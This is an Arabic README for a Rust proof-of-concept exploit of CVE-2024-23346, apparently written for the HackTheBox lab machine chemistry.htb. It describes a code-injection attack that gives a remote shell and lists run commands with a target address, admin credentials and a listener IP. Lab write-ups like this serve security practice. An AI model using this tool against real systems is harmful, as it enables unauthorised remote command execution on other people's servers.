
استغلال ثغرة CVE-2024-23346 مكتوب بلغة Rust يعمل كـ "terminal" (تم اختباره على chemistry.htb)
نص برمجي للاستغلال مكتوب بلغة Rust لثغرة CVE-2024-23346.
كما هو موضح أدناه، يستخدم إثبات المفهوم (POC) ثغرة حقن الأكواد وينفّذ أوامر shell عن بُعد كما في الطرفية.
خطوات تشغيل الأداة:
Cargo
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19أو
cargo build -r (سيكون الملف التنفيذي في target/release/poc)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19نص الاستغلال مستوحى من خبير البرمجة بلغة Python MAWK0235